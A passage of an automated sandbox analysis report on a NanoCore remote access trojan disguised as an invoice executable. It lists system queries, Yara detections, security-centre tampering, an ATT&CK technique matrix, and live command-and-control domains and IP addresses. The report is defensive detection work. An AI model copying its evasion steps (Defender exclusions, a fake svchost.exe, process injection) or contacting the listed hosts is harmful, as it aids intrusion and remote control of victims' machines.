        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings:

        barindex
        Changes security center settings (notifications, updates, antivirus, firewall)Show sources
        Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORY
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPE
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: CasPol.exe, 00000019.00000003.457248749.0000000006134000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604, type: MEMORY
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a25f38.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287990.exe.3a58d58.7.raw.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management Instrumentation1DLL Side-Loading1Exploitation for Privilege Escalation1Disable or Modify Tools21OS Credential DumpingFile and Directory Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsNative API1Application Shimming1DLL Side-Loading1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery23Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsCommand and Scripting Interpreter1Windows Service1Application Shimming1Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsService Execution2Registry Run Keys / Startup Folder1Access Token Manipulation1Timestomp1NTDSSecurity Software Discovery341Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptWindows Service1DLL Side-Loading1LSA SecretsVirtualization/Sandbox Evasion25SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonProcess Injection311Masquerading111Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol2Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder1Virtualization/Sandbox Evasion25DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection311/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 355838 Sample: CN-Invoice-XXXXX9808-190111... Startdate: 22/02/2021 Architecture: WINDOWS Score: 100 79 Malicious sample detected (through community Yara rule) 2->79 81 Multi AV Scanner detection for submitted file 2->81 83 Sigma detected: NanoCore 2->83 85 12 other signatures 2->85 8 CN-Invoice-XXXXX9808-19011143287990.exe 23 9 2->8         started        13 explorer.exe 2->13         started        15 explorer.exe 2->15         started        17 11 other processes 2->17 process3 dnsIp4 75 coroloboxorozor.com 104.21.71.230, 49715, 49723, 49726 CLOUDFLARENETUS United States 8->75 59 C:\Users\Public\Documents\...\svchost.exe, PE32 8->59 dropped 61 C:\Users\...\svchost.exe:Zone.Identifier, ASCII 8->61 dropped 63 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 8->63 dropped 103 Writes to foreign memory regions 8->103 105 Adds a directory exclusion to Windows Defender 8->105 107 Hides threads from debuggers 8->107 111 3 other signatures 8->111 19 CasPol.exe 8->19         started        24 AdvancedRun.exe 1 8->24         started        26 cmd.exe 8->26         started        34 3 other processes 8->34 28 svchost.exe 13->28         started        30 svchost.exe 15->30         started        77 127.0.0.1 unknown unknown 17->77 109 Changes security center settings (notifications, updates, antivirus, firewall) 17->109 32 WerFault.exe 17->32         started        file5 signatures6 process7 dnsIp8 65 nanopc.linkpc.net 185.192.70.170, 50005 UKSERVERS-ASUKDedicatedServersHostingandCo-Location Netherlands 19->65 67 185.157.161.86, 49739, 50005 OBE-EUROPEObenetworkEuropeSE Sweden 19->67 53 C:\Users\user\AppData\Roaming\...\run.dat, data 19->53 dropped 87 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->87 36 AdvancedRun.exe 24->36         started        39 conhost.exe 26->39         started        41 timeout.exe 26->41         started        69 coroloboxorozor.com 28->69 55 